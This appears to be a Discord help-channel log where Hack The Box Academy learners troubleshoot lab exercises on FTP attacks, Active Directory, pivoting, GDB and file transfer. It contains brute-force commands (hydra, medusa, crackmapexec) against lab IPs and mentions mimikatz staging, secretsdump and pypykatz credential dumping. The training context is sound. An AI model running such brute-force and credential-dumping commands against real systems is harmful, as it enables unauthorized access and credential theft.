Hey all, I'm doing the Intro to AD module and having trouble connecting with xfreerdp. Everytime I try to connect with the pwnbox, I get this return:
[18:29:26:557] [3091:3092] [ERROR][com.freerdp.core.connection] - Timeout waiting for activation
[18:29:26:559] [3091:3091] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]
Anyone know what this is about?
Is there anyone who could help me with the ftp attack module? please, I'm going crazy
It seems like there might be an issue with the connection timing out. Check your network connectivity, and ensure that the server you're trying to connect to is reachable. You may also want to verify the correctness of the connection parameters such as the server address and credentials. If the issue persists, consult the documentation for xfreerdp or seek assistance from your course instructor or technical support.
please help me..
did you mean Files Transfer Protocol
ftp attacks module?
yes,
Hi everyone,
I'm doing Misc CSRF Exploitation in the ADVANCED XSS AND CSRF EXPLOITATION module and when I log in into the vulnerable app, I immediately get logged out and there is no ||Promote button||, does anybody know if it should work like that?
because gobuster prob got perms to show facebook as example
i cant resolve the 2* answer
or it just didnt care enough
I used:
hydra -l robin -P /home/kali/Desktop/wordlists/rockyou.txt ftp://10.129.203.6
medusa -u robin -P /home/kali/Desktop/pws/pws.list -h 10.129.203.6 -M ftp -n 2121 -t 30 -f
crackmapexec ftp $10.129.233.82 -u robin -p ./home/kali/Desktop/pws/pws.txt --port 2121
but none produce any results
u mean attacking common services
yes, discord prevents me from sending the link, anyway yes, I am referring to the ''attack on common services'' module, in particular ftp attack
okay give me a sec
the question tells me: Use the discovered username with its password to login via SSH and obtain the flag.txt file. Submit the contents as your answer.
but using medusa, hydra and crackmapexec I can't find any password
you can absolutely send links to the module/section you're on
one moment, i have done this module but i didn't take many notes so im just starting it up again
hydra should work with ftp
are you using the mutated password list
the form among the resources gave me a file with passwords
nothing, it is so frustrating
oh wait
this is the acs one
hydra should work tbh
hello there, anyone willing help with the Slack cookie part of Pillaging section of Windows PrivEsc?, cuz the process described into the section is not working for me on my PC as Lab either...
If you're having trouble, consider checking the following:
Verify the target IP address and port.
Confirm the validity of your username and password lists.
Ensure that the FTP service is running on the specified port.
Check if there are any firewalls or security measures in place that could block your connection attempts.
the error is that the connections are getting dropped btw
how i can resolve?
it would be awkward if ftp wasn't running on the section regarding ftp
reset the target, see if you can ping it
also why are you doing ftp $10.129.233.82, i've never seen an ip with a $ in front of it
via this forum: https://forum.hackthebox.com/t/academy-attacking-common-services-attacking-ftp/257166
I have noticed that many have had some problems of this type, that is, they have to reset the target several times
however if I scan with nmap, nmap gives me some results
and
i think you may need to specify port with -s for hydra instead of ftp://ip:port
now i try
Im working on the password mutations section of the password attacks module and trying to solve this question. I've generated a custom wordlist using the resources provided but trying to use crackmapexec like I have for the other sections is going incredibly slow. I'm led to believe I should get the ssh hash and put it into john but I dont know how to do so
don't attack ssh
look for other running services
I was running crackmapexec on the ftp server as well but it was also going slow, do I need to just let it run for a long time?
Doesn't this command "sudo smbserver.py -smb2support CompData /usr/share/mimikatz/Win32" create a share called 'CompData'?
additionally is there any way to speed it up? I modified the threads to 1000 but that didn't seem to help anything
chatgpt ahhh response
I ask because I am unable to locate it on my machine
is it working correctly?
yes it's running
though i would have suggested using the smaller pws.txt file
because uhhhh rockyou is gonna take a minute
generally rockyou isn't gonna be used for Bruteforce as it's a HUGE list
i dont know what to do
the pws list with both medusa and hydra doesn't give me any kind of result
weird
I know that I find out the password via either medusa or hydra, with the ''pws'' wordlist that they gave me from the module, but neither of the two tools works, or rather, neither of the two gives me the password
too weird, what can I do in this case?
did you check anonymous logins?
you forgot to specify port
ftp -ip:2121?
anonymous login
can you be more clear?
that too, but dude didn't wait for ftp to prompt for username
so ftp took the error code of trying to ls as the username
which is actually funny
where it says name u need to put anonymous u typed ls as the username
it wasn't even that
literally he typed ls before ftp sent the login response
ik cuz i did the same
u have to wait for the name thing to appear
so the error code that came up 331 Password required for ls was taken as the login username
so now I have to write anonymous?
yes
yup
just hit enter
"Anonymous login ok" > this part means you can literally log in as anon
and use anything as your password, it doesn't do any kinda email verification check
ok now I'm logged in, can you please tell me the wget command to download everything?
wget isn't an ftp command
help can be the answer
ok this thing is very important for me, as I hadn't grasped this thing which is very subtle
thank you marciel
it's covered in the Footprinting Module btw
if you're doing the CPTS path; please do them in order lol
PLEASE 🙂
and even then Footprinting is a pre-req for Attacking Common Service
as it covers basic recon for these services
Now I'll go ahead on my own to understand how to download the files, you've been a great help Marciel, thank you very much
is running crackmapexec on the ftp server the right direction?
Intro to Assembly Language
Debugging with GDB
Download the attached file, and find the hex value in 'rax' when we reach the instruction at <_start+16>?
I'm running the code then doing this
|| gef➤ x/wx 0x401010
0x401010 <_start+16>: 0x00bf0000 ||
But it doesn't seem to be the answer
I'm not sure to understand
it can be
on or against ?
unfortunately here we are, why does it say permission denied?
do you have permission to write to where you're downloading to?
i.e. are you in a root-protected directory
also: passowrd.list
you typoed
i meant: from the directory you launched ftp from
i.e. / or /root/ i cannot recall if /home/ is
/home
just type cd or cd ~ to get to your user's home directory
then try downloading again
/home/ is where the users are and is (in-fact) a root protected directory
I don't know if I didn't understand anything, or I'm not able to download these files
you need to exit ftp before changing your working directory
i dont understand
I don't understand what changing the folder on my Kali has to do with the fact that ftp prevents me from downloading the files
why can't I download the files?
I then ran these two commands on my Windows machine :
net use \\10.10.15.20\CompData
cd windows
PS C:\windows> mkdir temp
PS C:\windows> dir
copy /CompData /windows/temp/
Did not see the mimikatz folder copied to my windows machine
generally in linux you will have a root directory containing every file on the system. this directory is owned by root and every user must abide by its permissions placed on this folder. from where you did your ftp command is this folder.
root can read, write, and execute all files within the root dir. all other users can only read files. you, the kali user, can only read files. you are attempting to download (write) a file to that directory, which is not possible because of the permissions.
so do I have to run the command from root?
probably it works
perhaps, but you can just move to a directory where you do have the permissions to write files to it, e.g., your user's home directory
this is a really strange thing, I discovered the world, that is, I didn't know that based on how you log in, whether as root or as a normal user, ftp recognized this thing
has someone used metasploit for the "Other Notable Applications" in the "attacking common application" module and can help me to configure it? because i got "Exploit completed, but no session was created" and i think its because of the payload ! but there are more than 200 payloads for the exploit
he downloaded it for me, it worked
can someone help me with that
you shouldn't need to use root unless you have to
marcie was trying to tell you to change your working directory as the kali user, not to use root
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
anyone faced an issue that when rebooting splunk, it never goes up again!
Hello, kind fellows of HTB.
I come yet with another issue:
Pivoting, Tunneling and Port Forwarding Module.
SOCKS5 Tunneling with chisel.
Can someone tell me what am I supposed to do? Do I have to install the library on the target host? (worst case scenario, if I can't fix it on my kali I will just use pwnbox).
but I would recommend ligolo, it is way easier in my opinion
See, the task is to use chisel.
I downloaded it, built a binary and transferred it via scp to the target host.
sorry I was wrong it is server on pivot & client on host my bad
better dl the binary
download
Oh..
So, you want me to start an http for example in the chisel directory and wget from the target.
For example.
Wget the binary**
and scp it to the host for example
good luck bro
Gl, ser.
I'll be back 😉
Solved: Used static build.
nice
Hey Guys, stuck at ACL's in AD Module with the following question:
What is the ObjectAceType of the first right that the forend user has over the GPO Management group? (two words in the format Word-Word)
Any idea what command to use?
still havent found
how do I fix this NoneType error with secretsdump.py?
Hello can you help me plz ? How to do a reverse shell with modules ??? https://academy.hackthebox.com/module/158/section/1435
check again your sam, security and system dump.
other options is using pypykatz .
what should I check them for? Ive used cat on all of them and they contain something
Thanks, i found with google mighty help....
Thank you very much for the tip @supple gorge10
next hint for others who are struggling with this question: the idea is to improve detection! Copy the answer template to another text editor, IlO0 problem :), you do not see the hint with the human eye, your regex will be more focused than mine.
After that dig into the attack, all info is in the packet capture, copy it somewhere and work on it. Also read the link at the top of the network detection part, it will help. Payload is "content: value;" that should be in local rules (value is the answer)
"Working with IDS/IPS, anyone ever done the skills assessment Suricata" Assessment module
I ran with the pypykatz command in the cheatsheet and got an error as well
The one showcased on the section
you probably want to update pypykatz, the one in kali apt is very outdated, uninstall and install with pip
lsass memdump is not the same as dumping the reg hives
yeah, cant find it
step to the right instruction, look at rax
Can someone help me regarding why I am not able to transfer my mimikatz file to my windows machine? I have followed the instructions listed here:
https://0xdf.gitlab.io/2018/10/11/pwk-notes-post-exploitation-windows-file-transfers.html
sudo smbserver.py -smb2support CompData /usr/share/mimikatz/Win32
net use \\10.10.15.20\CompData
PS C:\> copy \\10.10.15.20\CompData\ C:\
PS C:\> dir
you didn't specify the file to copy
copy \\10.10.15.20\CompData\<filename> C:\
and the user probably doesn't have write perms to C root
Also plausible
I mean if you wanna follow the command at least do the same thing
Found it with a googled command
yes, that's usually the case too
@cedar void check this 👆
Get-DomainObjectACL is definitely gone over in that section
Yeah my bad, thanks for reply
copy \\10.10.15.20\CompData\usr\share\mimikatz\Win32 C:\
Tried that and that didn't work.
Could I change the permissions by running as an Administrator with a command line in powershell?
that's also not what the example command is doing, you need to specify an outfile name and the file you're trying to copy
Hey guys , I have a question can any one help me ?
We can't answer questions you don't ask
I recently downloaded GNS3 on a Debian device, but I'm having a problem when opening Wireshark: the window opens and does the loading, but suddenly it closes. I tried hard to find a solution but didn't find one. I tried Wireshark alone and it worked without any problem, but not with the use of gns3
Can anyone help me to fix this issue
You don't need to specify the full file path with smb. You just need the filename since you have it set to that directory already
This doesn't sound like a module related question: read #welcome
Ok ty
Okay I changed my copy command to 'copy \\10.10.15.20\CompData\mimikatz.exe C:' and the folder still did not copy over.
Would it be because of a permission issue?
Another question, for "Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer." i have to use Dagmar Payne?
Like, reset her account and from there create a fake SPN for adunn?
hey y'all I have a problem regarding the pivoting skills assessment I'm trying to transfer a file from a machine to my home machine but I'm getting an error and I'm not quite sure why
I'm running a smb server with:
" impacket-smbserver -smb2support data . -port 4444"
and I've set up a listener on my ligolo agent that listens on port 4444 on 0.0.0.0 of the pivot machine and sends it to 0.0.0.0:4444 of my attack host,
However when I run the command ''' cp ./file \<pivot-ip>:4444\data '''
I get the error:
''' cp : the network path was not found '''
any help would be appreciated
Try specifying a filename in the C:\ portion
Or copy to temp
C:\Windows\temp
when you use unc on windows \\ip\share\, it wil always go to port 445 ie the standard smb port, and ligolo can't reverse tunnel smb traffic
damn ok thanks I'll do something else then
@fathom pendant is this idea right?
The section should talk about setting spns
Don't just skim, read
That's the part I don't really understand. When I enter debug mode I have Start+12 and start+17, I have nothing in between. I'm not sure how I can go to the good one with step. Can we go in dm since I can't upload a picture there
I can't since I use htb enterprise
I don't see the point of having 2 accounts tbh
there's sso.hackthebox.com that allows you to link your accounts
I can link my enterprise and normal account with that ?
yes
it's a feature of SSO to sync progress with Enterprise and Lab accounts as well
Ok but I still need to create another account
but if they are both linked that's more interesting
yep your progress will get linked so you don't have to redo boxes and stuff
ok ty
np
how can I find on the sso link the account identifier ?
Is anyone working on the Advanced Web Exploitation course yet? I have a question about the "Injection Attacks" Skills Assessment.
Do i still need to create a classic academy account
Guys I need help, i can't identify in #bot-commands it's throwing me an error, i did open a ticket on the website, but maybe someone here can give some insight if it happened to them. I know this is not the right channel but it's the few i have access to for right now.
I tried the Windows\temp method and don't see the mimikatz.exe file in that temp folder:
"copy \\10.10.15.20\CompData\mimikatz.exe C:\Windows\temp"
I did not see the mimikatz.exe executable file.
I also tried 'copy \\10.10.15.20\CompData\mimikatz.exe C:\Windows\temp\a.exe' (exactly like the example from the link I posted) and that did not work
Ok I guess I'll use that for now
link accounts with SSO; then use your main labs account identifier
Yeah it didn't work I cant link my main lab account
you should be able to just click connect to academy and it'll do it
with sso I contacted support
weird it worked fine for me
might be some weird thing that's causing conflict ¯\_(ツ)_/¯
It says I'm already linked with another sso account and I just created the account 10min ago lol
weird LMAO
So here is the problem. I'm still really new to assembly. you told me to put the breakpoint at start + 16 but I only have +12 and +17, I have nothing between. I think there's something I didn't understand cause I can do other things like || gef➤ x/wx 0x401010
0x401010 <_start+16>: 0x00bf0000 || and I see the start + 16
yep, your gdb is in b16 for some reason
or wait wouldn't it be 0010? in b16
Isn't it the same one than the last module ?
could it be a permissions issue?
I'll try downloading it again starting from scratch just to see
no
my computer put a (1) so I thought it was the same lol
because it's called the same thing
which imo is kinda dumb of htb LMAO
nah not a you thing; HTB should def have them called diff things in the backend
or you can alternatively rename it <section_name>.zip after downloading
the zip name is unique tho, the previous sections isn't named that
is it? i honestly never looked at the asm module
yeah, idk where they got the other file from
weird ¯\_(ツ)_/¯
weird
the file inside should be called gdb
you were using disasm
are you at the right section
thats what I have
Ok so I was just not in the good file --'
so his instruction would be at + 10?
yep
the xor rax,rax instruction looks to be what will hold the answer then
wdym by that
it means it's giving you the instruction + in base 16 instead of base 10
16 in base 10 translates to 10 in base 16
{1,2,3,4,5,6,7,8,9,a,b,c,d,e,f}
this isn't confusing at all if you're not familiar with hex
my brain just works in 10/16
i used to dabble in pixel art stuff and manually inputting the values
yea it's correct, just looks funny
ok but since I need the hex value I need to stay in base 16 no ?
i think regardless the value is stored in hex
again step to the right instruction, look at the value in rax
the debugger is just in b16 mode for stepping
Can someone help me with identifying on discord? It's throwing me an error when i do so.
message a mod or admin
plenty are online atm
I did but nobody responding.
just be patient
it's the weekend and they're likely having a life
:P except maybe @slender shoal he has no life

Yeah that's why I don't want to message multiple people, waiting on somebody to respond. But thought somebody maybe can help.
no one here can help you tbh
But how do I know which one is the right instruction? like you said I was gonna use start+16 to see that, but I just don't have it

